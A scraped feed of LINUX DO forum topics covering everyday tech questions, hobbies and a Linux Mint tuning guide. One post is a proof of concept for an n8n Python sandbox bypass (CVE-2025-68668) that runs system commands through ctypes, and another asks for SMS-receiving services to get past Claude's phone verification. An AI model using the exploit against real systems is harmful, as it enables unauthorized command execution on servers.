张汉熙《高级英语》

其实还没有开始读

主要是一说英语就是新概念，或者经济学人
这两个我都看不进去
新概念呢，是译文有错，本来英语就差再参考参考就更差了
经济学人呢，有大佬带着倒好梳理背景知识跟听小说似的，没有就玩完

想着看看英语专业的人读什么呢，知乎上搜到了张汉熙
正好B站有讲解的
试试试试

2 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: K_7723)

佬们，公司项目要求源代码加密(.py)+docker部署，容器运行后容器内也不能留源代码明文。有实现思路嘛

有大佬指点指点嘛？目前方案是用go做一层加解密，然后docker启动方式就启动go来运行

5 posts - 5 participants

Read full topic

via LINUX DO - 最新话题 (author: 大番茄)

单板雪鞋，这么选呀🥹

元旦去狼牙山滑雪场去滑了一次，感觉有点上瘾！新手应该弄个什么雪鞋呢，租的雪鞋有点惨不忍睹！想自己买双雪鞋(っ≧ω≦)っ❄️ 万能的佬友们，求推荐(o^з^o)💞

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: 陈清泉（副院长）)

minecraft转正

玩了这么多年的盗版，也算是给自己的热爱一个胶带了。

11 posts - 4 participants

Read full topic

via LINUX DO - 最新话题 (author: 風憩)

Invalid media: image

现在还有好用的接码平台可以接claude验证码吗？

现在注册claude需要接手机验证码了，我用的几个接码平台都接不到，求佬友推荐一下

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: 伊卡洛斯)

有没有好用的可以开箱即用的ai写论文的项目

之前看过佬的这个一个月全力打造，开源网站助您快速完成论文，集成 ChatGPT 实现真实文献引用，

但好像用deepseek的生成的篇幅有点短，目前还没有尝试过用其他的api试试。我之前写的综述类作业一般都是用的deep research。

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: 木瓜蛋白酶Tea🎋)

谷歌云服务被封了怎么办？

我这个账号才解封，一两个月吧,解封了就成这样了，提交申诉也没回应,有没有大佬知道怎么解决?
3 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: yi R)

Invalid media: image

笑死了，没想到GPT这个浓眉大眼的，也学会谄媚了

是因为我用的是ChatGPT吗 🤣

6 posts - 4 participants

Read full topic

via LINUX DO - 最新话题 (author: demotoo)

Invalid media: image

四年前录的手机指纹现在识别率低了

以前录的右大拇指，最近一直识别失败，突然想到是不是指纹变了而不是手机指纹模块坏了？于是重新录入，又可以准确识别了
为什么会这样？

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: liuweiqing)

Invalid media: image

《疯狂动物城 2》获 2026 元旦档票房冠军，即将超越《复仇者联盟 4》登顶进口片冠军榜 - IT之家

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: 𝓵𝓮𝔃𝓲𝓼𝓱𝓮𝓷)

Invalid media:
image
image
image
image

佬友们都在用什么路由器呢

想买个路由器刷机去用openclash，方便电脑安装linux时可以从github上面克隆，要不然yay用的有点难受🥲，有佬友在用的路由器可以推荐的吗👀

7 posts - 5 participants

Read full topic

via LINUX DO - 最新话题 (author: Mugzx)

YouTube Premium 油管会员，开始跨区清退/封号了吗？

油管会员，开始跨区封号了吗？
5人车开的印区服务，美区家庭组。
这位车友，平时用的美区节点，1月1日收到了这个邮件
同一趟车上的其他人，暂无这情况
25年9月份油管虽说是更新了条款，但全网没见大面积封号哇

2 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: 777)

Invalid media: image

这段时间很多流量卡都下架了，这咋回事，大家有推荐的流量卡吗？

2 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: coding)

而你，我的朋友，你在干什么？

你的对手在看书
你的仇人在磨刀
你的朋友在减肥
你的隔壁在练腰
而你，我的朋友，你在干什么？😜

21 posts - 21 participants

Read full topic

via LINUX DO - 最新话题 (author: xuanfeng)

「摄影📷」当尼康遇上富士色调，是富士康！

我太喜欢这个蓝色调了

🎄🍎平安夜
📷️相机：Nikon ZF
🎞️色彩：FUJI VV & NC
📌地点：上海 淮海中路/巨鹿路

2 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: Ling_Jing)

Invalid media: image

成功开通GCP免费虚拟机

目前是搭了个酒馆和OpenList，走Cloudflare加速 🥰
可惜才1G内存，而且SSH延迟超高，输入命令都一卡一卡的……
3 posts - 3 participants

Read full topic

via LINUX DO - 最新话题 (author: YOAKE)

Invalid media: image

闲来没事，让gemini优化了LinuxMint，完事还挺快，嗖嗖的

⚠️⚠️⚠️ ，以下由AI生成，优化不适合所有人，不提供任何修改系统建议！！后果自负！！！

Linux Mint 优化

前言

● 目标：在保证系统稳定的前提下，大幅降低延迟、提升桌面响应速度（跟手感）并缩短开机时间。
● 适用环境：Linux Mint + rEFInd 引导, Ryzen 5600X + RX6650XT+ NVME 32GB RAM+

----------------------

第一阶段：BIOS 设置 (硬件层)

在进入系统前，确保硬件功能已完全释放。

1. 开启 Resizable BAR (Re-Bar) ● 作用：让 CPU 能一次性访问显卡的所有显存，提升游戏帧数 (5%-15%)。 ● 操作：重启进入 BIOS，找到并开启以下两项： ● Above 4G Decoding → Enabled ● Re-Size BAR Support → Enabled ● 验证方法：进入系统后终端执行 dmesg | grep "BAR="，若看到类似 BAR=8192M 即成功。

----------------------

第二阶段：文件系统优化 (Btrfs)

针对你的 NVMe SSD 和 Btrfs 分区进行性能与寿命优化。

1. 修改挂载参数 (/etc/fstab)

这将开启透明压缩（提升读取速度、减少写入）和异步修剪（防止删除文件时卡顿）。

1. 备份配置文件：

sudo cp /etc/fstab /etc/fstab.bak

2. 编辑文件：

sudo nano /etc/fstab

3. 替换内容：找到挂载 / 和 /home 的行，将其参数部分修改如下（保留 UUID 不变）： ● 根分区 (/)：

UUID=... /  btrfs  rw,noatime,compress=zstd:1,space_cache=v2,discard=async,subvol=@ 0 1

● Home分区 (/home)：

UUID=... /home  btrfs  rw,noatime,compress=zstd:1,space_cache=v2,discard=async,subvol=@home 0 2

4. 应用更改：

sudo mount -o remount /
sudo mount -o remount /home

2. 启用自动维护

防止 Btrfs 长期使用后变慢。

sudo apt install btrfsmaintenance
sudo systemctl enable --now btrfsmaintenance-refresh

----------------------

第三阶段：内核启动参数 (rEFInd 引导)

这是提升系统响应速度的核心。由于你使用 rEFInd，我们需要直接编辑其配置文件，而不是 GRUB。

目标参数

● preempt=full：强制完全抢占模式。极大降低系统延迟，让操作更丝滑。
● amd_pstate=active：启用 AMD 新一代 CPU 驱动，提升能效和响应。

操作步骤

1. 编辑 rEFInd 配置文件：

sudo nano /boot/refind_linux.conf

2. 修改/新建内容：确保文件内容如下（第一行作为默认启动项）：

"Boot with Opts"  "quiet splash preempt=full amd_pstate=active"
"Boot Safe"       "quiet splash"
"Boot Fallback"   "ro recovery nomodeset"

3. 保存：Ctrl+O 保存，Ctrl+X 退出。
4. 验证：重启后执行 cat /proc/cmdline，确保输出包含上述参数。

----------------------

第四阶段：系统内核参数调优 (Sysctl)

合并网络、内存、I/O 的优化设置到一个文件中。

1. 创建配置文件：

sudo nano /etc/sysctl.d/99-mint-optimization.conf

2. 粘贴以下所有内容：

# --- 网络优化 (开启 BBR) ---
# 提升网络吞吐量，改善网页加载和视频播放
net.core.default_qdisc = fq
net.ipv4.tcp_congestion_control = bbr

# --- 内存与脏页优化 (针对 32GB 内存) ---
# 降低使用 Swap 的倾向，优先用物理内存
vm.swappiness = 10
# 增加 VFS 缓存保留目录结构的倾向，加快文件浏览
vm.vfs_cache_pressure = 50
# 优化脏数据回写，避免大数据拷贝时系统卡死
# 32GB 内存下，限制脏数据堆积量
vm.dirty_ratio = 10
vm.dirty_background_ratio = 5

# --- 内核调试 ---
# 禁用非屏蔽中断看门狗，减少微小中断，略微省电
kernel.nmi_watchdog = 0

3. 应用配置：

sudo sysctl -p /etc/sysctl.d/99-mint-optimization.conf

----------------------

第五阶段：服务与启动速度优化

砍掉无用的等待时间，让开机直达桌面。

1. 消除最大瓶颈 (节省约 7秒)

禁止系统开机傻等网络连接。

sudo systemctl disable NetworkManager-wait-online.service

2. Docker 优化 (按需启动)

平时不占用资源，只有在终端输入 docker 命令时才瞬间激活。

sudo systemctl disable docker.service
sudo systemctl enable docker.socket

3. 移除星火商店的升级服务提示

sudo systemctl disable spark-update-notifier.service

----------------------

验证与总结

完成以上所有步骤后，请重启电脑。

验证清单

1. 启动速度：运行 systemd-analyze，查看 Boot 时间是否明显缩短。
2. 内核模式：运行 dmesg | grep "preempt:"，应显示 Dynamic Preempt: full 或类似信息。
3. AMD 驱动：运行 cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver，应输出 amd-pstate-epp。
4. BBR 算法：运行 sysctl net.ipv4.tcp_congestion_control，应输出 bbr。

3 posts - 3 participants

Read full topic

via LINUX DO - 最新话题 (author: dqwed)

Antigravity老卡怎么办！！！！

佬们，反重力动不动就会出现这种报错怎么办 有时候一直出现根本跑不动 :tieba_087:

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: 比奇堡-派大星)

Invalid media: image

POC n8n Python代码节点沙箱绕过导致系统命令执行 (CVE-2025-68668)

前言

今天各家都通报了CVE-2025-68668 n8n Python代码节点沙箱绕过导致系统命令执行漏洞，但没有poc，特有此文，文中poc仅供合法测试，用于企业自查，切勿用于非法测试，未授权测试造成后果由使用者承担，与棉花糖公众号无关。

漏洞概述

n8n 是一款开源的可视化工作流自动化平台，广泛应用于企业自动化、数据处理和 DevOps 场景。平台采用节点式设计，支持用户通过拖拽组件构建业务流程。受影响的 Python 代码节点允许用户在工作流中执行自定义代码。该节点基于 Pyodide 技术，为代码执行提供安全的沙箱隔离环境。作为一款主流自动化工具，n8n 拥有广泛的用户基础。

漏洞原理

n8n 的 Python (Pyodide) 模式配置了黑名单，在packages/nodes-base/nodes/Code/Pyodide.ts中：

如果执行这样的代码：

import os
os.system('ls')

是会被阻止的：

但并未阻止ctypes库， ctypes 是 Python 的 FFI 库，允许 Python 代码直接调用 C 函数，他的libc有system(), fork(), execl()等函数可用，测试的时候fork(), execl()被拦截了，system()能用，于是我们可以构造出一个使用ctypes去执行系统命令的poc：

import ctypes
libc = ctypes.CDLL(None)
libc.system(b'ls')

本地环境验证：

import ctypes
import os

libc = ctypes.CDLL(None)
libc.system.argtypes = [ctypes.c_char_p]
libc.system.restype = ctypes.c_int
result = libc.system(b'echo "mht CVE-2025-68668" > /tmp/test.txt')

return {
    "vulnerability": "SUCCESS"
}

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: 棉花糖)

Invalid media:
image
image
image

为什么cliproxy会同时消耗几个号的额度

不应该是一个号的额度用完了自动换到另一个号吗
还是我没配置对啊

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: daemon)

Invalid media: image